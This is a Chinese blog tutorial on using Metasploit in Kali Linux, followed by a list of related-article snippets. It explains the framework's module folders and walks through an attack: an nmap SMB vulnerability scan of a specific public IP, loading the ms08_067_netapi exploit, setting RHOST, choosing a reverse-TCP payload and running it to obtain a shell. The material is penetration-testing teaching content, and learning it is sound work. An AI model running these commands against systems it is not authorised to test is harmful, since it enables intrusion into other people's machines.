kali漏洞利用之Metasploit实战

最新推荐文章于 2024-06-13 22:39:45 发布
最新推荐文章于 2024-06-13 22:39:45 发布
阅读量2.1w 收藏 52
点赞数 4
分类专栏: 网络攻防 文章标签: 测试 框架 漏洞 postgresql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/The__Apollo/article/details/70475962
版权

Metasploit在渗透测试中经常被用到,实际上这套软件包括了很多工具,这些工具组成了一个完整的攻击框架。他们或许在渗透测试中的每一方面都不能称为最好用的工具,但组合起来的框架却让它变得强大。

1.启动服务:

在kali中使用metasploit,需要先开启PostgreSQL数据库服务和metasploit服务,然后就可以完整的利用msf数据库查询exploit和记录
这里写图片描述
2.路径介绍

kali中,msf的路径为/usr/share/metasploit-framework
这里写图片描述
比如modules中,是我们在msf中经常会利用到的一些工具
这里写图片描述
auxiliary:辅助模块

encoders:供msfencode编码工具使用,具体可使用msfencode -l

exploits:攻击模块,每个介绍msf的文章都会提到那个ms08_067_netapi,它就在这个目录。

payloads:这里面列出的是攻击载荷,也就是攻击成功后执行的代码。比如我们常设置的windows/meterpreter/reverse_tcp就在这个文件夹下。

post:后渗透阶段模块,在获得meterpreter的shell之后可以使用的攻击代码。比如常用的hashdump,arp_scanner就在这里。

3.基本命令

msfpayload:用来生成payload或者shellcode

搜索的时候可以用msfpayload -l |grep “windows”这样的命令查询。

-o 选项可以列出payload所需的参数

msfencode:

msf中的编码器,现在常用msfpayload与它编码避免exploit的坏字符串(比如00,会起到隔断作用)

msfconsole:

开启metasploit的console

4.测试示例:发现漏洞,搜索exploit,先用nmap扫描主机,扫描命令

nmap -sS -sV -O --script=smb-check-vulns.nse -n 222.28.136.22

这里写图片描述
可以看到,其中含有漏洞MS08-067

在console中搜索一下,可以看到下面的界面
这里写图片描述
然后就use其中一个版本

use exploit/windows/smb/ms08_067_netapi

查看一些参数
这里写图片描述
可以看到RHOST(远程IP地址)还没有设置,这时我们就使用下面的命令来设置

set RHOST 222.28.136.22 

选择payload
这里写图片描述
设置好之后,就可以对目标进行攻击测试,输入exploit即可,如果成功,就会返回一个shell

the__apollo
关注
  • 4
    点赞
  • 52
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
玩转Metasploit初级系列课程
08-15
Metasploit社区不断推出新的漏洞利用模块和功能,因此,定期关注Metasploit Framework的更新和社区动态,是保持知识最新状态的关键。 在“玩转Metasploit初级系列课程”中,你将逐步掌握这个工具的精髓,从基础操作...
kali-linux-web-pentest-cookbook
11-21
漏洞利用部分,读者会接触到Metasploit Framework这样的强大工具,学习编写和执行exploits来攻破脆弱的Web应用。此外,还会探讨如何利用社会工程学技巧,如钓鱼攻击和凭证破解,来进一步提升渗透测试的效果。 接...
kali使用Metasploit进行渗透攻击实验
最新发布
ysm_zxc的博客
06-13 664
信息安全技术
Kali渗透测试:使用工具Metasploit攻击操作系统
Liu_Bruce的博客
05-12 6747
Kali渗透测试:使用工具Metasploit攻击操作系统 如果在目标系统上发现了漏洞之后,接下来就是要利用漏洞渗透工具对目标系统进行攻击。Metasploit是目前非常优秀的一款漏洞渗透工具。 1.1 Metasploit基础 2003年左右,H.D Moore和Spoonm 创建了一个集成了多个漏洞渗透工具的框架。随后, 这个框架在2004年的Black Hat Briefings 会议上备受关注,Spoonm在大会的演讲中提到,Metasploit的使用非常简单,以至于你只需要找到一个目标,多次单击鼠
【2024最新版】超详细Kali安装保姆级教程,Kali Linux环境配置和使用指南,看完这一篇就够了
2301_79058150的博客
04-28 1368
时,如果分区方案没有其他问题,应该选择“是”GRUB是用来从硬盘中启动一个操作系统的程序,根据提示选择默认的“是”即可。9)确认分区方案,选择“将所有文件放在同一个分区中(推荐新手使用)”10)继续确认分区更改,选择“结束分区设定并将修改写入磁盘”4)再根据提示设置一个域名,比如“abcd.cn”,继续。2)选择语言、接下来的步骤依次选择“中国”->“汉语”-将空白、休眠、关闭都设为“从不”然后“关闭”即可。提示设置主名时,可以接受默认的“kali”在“软件选择”的环节,直接接受默认选择即可。
kali 漏洞利用
ReZero's Blog
01-26 666
medusa -h target_ip -u uer -p passsword -M service u可替换为U后跟文件,同理p也可 M 后跟所攻击的服务(例如SSH) 2.
Kali——auxiliary(辅助模块)-metasploit工具module模块衍生
qq_63167128的博客
03-07 934
auxiliary(辅助模块) 路径目录:usr/share/metasploit-framework/modules/auxiliary 1.通过使用auxiliary模块中的check模块来进行漏洞检测,查看该主是否存在该漏洞 示例:主是否存在ms12-020漏洞 use auxiliary/scanner/rdp/ms12_020_check //使用ms_12_020_check模块 show options //查看该模块需要哪些参数 set RHOST ip address //
解决kali linux使用metasploit报错办法
dda6607的博客
07-30 348
1 curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && \chmod 755 msfinstall &...
Kali Linux中的Armitage:强大的渗透测试漏洞利用工具
sheaadens的博客
07-03 1002
Armitage是一个强大而灵活的渗透测试漏洞利用工具,可以帮助你简化渗透测试过程并提高工作效率。本文介绍了Armitage的安装和基本使用方法,并提供了一些与Metasploit框架交互的示例代码。其中一个特别强大的工具就是Armitage,它是一款图形化的网络攻击管理工具,能够帮助安全专家和渗透测试人员更好地进行网络渗透测试漏洞利用。2. 漏洞利用:Armitage集成了Metasploit框架,提供了丰富的漏洞利用工具。3. 趋势分析:Armitage可以帮助你分析和可视化渗透测试过程中的数据。
利用Kali Linux工具初步探索漏洞示例:透视安全测试的艺术
Kali与编程
04-10 357
无论是信息收集阶段的Nmap,还是漏洞探测阶段的Nessus和OpenVAS,亦或是Web应用安全审计的ZAP和Burp Suite,以及漏洞利用阶段的Metasploit,均能帮助我们从不同角度和层面发现、验证并利用漏洞。这条命令将进行TCP SYN扫描(半开放扫描,不易被防火墙拦截),执行操作系统指纹识别,并忽略目标主的Ping检查,直接进行扫描。本文将通过具体的示例,详细介绍如何利用Kali Linux中的部分工具进行漏洞探索,以展现其在安全测试中的价值和实用性。一、信息收集阶段:Nmap扫描。
工控安全职业证书技能实践:工控已知漏洞验证与实战.docx
07-12
2. **Metasploit框架(Msf)**:Msf是一个开源的安全工具,用于渗透测试漏洞利用。在实验中,它被用来加载和配置漏洞模块,进行攻击演示。熟悉Msf工具的使用是网络安全专家必备的技能。 3. **Linux基础**:实验...
kali linux
09-14
2. **漏洞扫描**:利用Nessus、OpenVAS、Metasploit等工具,可以自动或手动寻找系统中的已知漏洞。这些工具能帮助确定哪些服务是易受攻击的,并提供可能的利用方法。 3. **权限提升**:一旦找到可利用漏洞,渗透...
Kali Linux在高职信息安全技能教育中的应用.pdf
09-06
Kali Linux的集成工具如Nessus、Owasp ZAP、BurpSuite、Metasploit和Sqlmap等,可以帮助学生进行安全扫描、漏洞检测、Web应用程序的安全测试数据库漏洞验证等实际操作。这些工具的使用,使学生能够在模拟环境中...
kali-漏洞利用】(3.2)Metasploit基础(中):Armitage工具利用过程
08-05 774
kali-漏洞利用】Armitage利用过程
kali:Nessus扫描漏洞并用msf利用攻击xp系统
qq_45747414的博客
11-23 5651
Nessus扫描漏洞 1.启动nessus服务 /bin/systemctl start nessusd.service 2.在浏览器打开https://192.168.50.128:8834/,登陆 3.进入开始扫描 在启动nessus过程中遇到的问题: NOTICE: Nessus has detected that API access on this scanner is disabled. 这里尝试了使用指令/opt/nessus/sbin/nessuscli update --all ##
MS14-066漏洞测试工具
iteye_16188的博客
11-22 7369
工具地址:[url]https://github.com/anexia-it/winshock-test[/url] 下载方法:[code="java"]git clone https://github.com/anexia-it/winshock-test.git[/code] 扫描原理:根据扫描支持的4中密码来判断是否有漏洞漏洞原理:[url]http://www.freebuf.c...
20141211,微软12月10日发布7个安全补丁
微软大中华区安全博客
12-11 1769
大家好,我们是微软大中华区安全支持团队。微软于北京时间2014年12月10日发布了7个新的安全公告,其中4个为严重等级,3个为重要等级,共修复Microsoft Windows、Internet Explorer (IE)、Office 和 Exchange 中的24个漏洞。建议优先部署MS14-080 和MS14-081。MS14-080 | Internet Explorer 的累积安全更新
渗透测试工具——Metasploit
热门推荐
weixin_59872639的博客
01-14 3万+
Metasplout简介 Metasploit是一款开源的安全漏洞检测工具,同时Metasploit是免费的工具。 Metasploit核心中绝大部分有Rudy实现,一小部分由汇编和C语言实现。 kali中自带Metasploit Metasploit文件结构与模块 路径: /usr/share/metasploit-framework/ config: MSF环境配置信息数据库配置信息 data:后渗透模块的一些工具及payload,第三方小工具集合,用户字典等数据信息 doc
kali linux 渗透测试之内网渗透
05-02
理论加实战结合,学习后具备自动化批量控制内网主的能力,具备安全工程师岗位的基本能力。专注培养高薪网络安全人才,帮助大家了解并学习网络安全,传授黑白帽实战技能,带领零基础小白正式踏入入门阶段。
kali linux渗透实战metasploit
04-11
使用Kali Linux操作系统可以... Metasploit是一款功能强大的框架,可用于漏洞分析和漏洞利用。它具有多种模块,包括扫描、漏洞利用和后渗透攻击。使用它可以对系统进行测试,寻找系统中的漏洞并建议必要的补丁程序。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值